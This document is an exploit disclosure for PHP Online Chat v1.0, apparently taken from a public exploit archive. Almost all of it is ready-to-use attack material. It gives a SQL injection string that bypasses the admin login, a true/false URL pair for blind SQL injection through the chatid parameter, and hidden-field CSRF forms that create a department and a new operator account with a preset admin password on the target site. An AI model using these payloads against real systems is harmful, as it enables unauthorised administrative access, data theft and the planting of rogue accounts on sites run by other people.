facebook facebook twitter rss

PHP Online Chat v1.0 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 20-06-2012
#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://phponlinechat.com/
.:. Tested On Demo : http://phponlinechat.com/phpchat/
#######################################################################

===[ Exploit ]===


Auth Bypass
==============

http://SITE/admin/login.php

Username: ' or 'a'='a
Password: ' or 'a'='a


Blind Injection
===============


http://SITE/admin/display_transcript.php?chatid=1+and+1=1 True
http://SITE/admin/display_transcript.php?chatid=1+and+1=2 False


Multiple CSRF
=============

Add Department
===============

<form method="POST" name="form0" action="http://SITE/class/dept/putdata.php">
<input type="hidden" name="action" value="insdept"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="dname" value="Mohammad"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="desc" value="....."/>
<input type="hidden" name="startmsg" value="....."/>
<input type="hidden" name="endmsg" value="....."/>
<input type="hidden" name="nousermsg" value="....."/>
<input type="hidden" name="transcript" value="1"/>
<input type="hidden" name="transcriptexpire" value="5 day"/>
<input type="hidden" name="emailtranscript" value="1"/>
<input type="hidden" name="visiblepublic" value="1"/>
<input type="hidden" name="chatqueue" value="1"/>
<input type="hidden" name="polltype" value="0"/>
<input type="hidden" name="maximum" value="5"/>
</form>

</body>
</html>


Add Operator
============

<form method="POST" name="form0" action="http://SITE/class/dept/putdata.php">
<input type="hidden" name="action" value="loadList"/>
</form>
<form method="POST" name="form1" action="http://SITE/class/dept/putdata.php">
<input type="hidden" name="action" value="insopr"/>
<input type="hidden" name="oid" value=""/>
<input type="hidden" name="name" value="Mohammad"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="121212"/>
<input type="hidden" name="rate_operator" value="1"/>
<input type="hidden" name="opr2opr_chat" value="1"/>
<input type="hidden" name="seldept" value="1,"/>
</form>

</body>
</html>
#######################################################################

Like us on Facebook :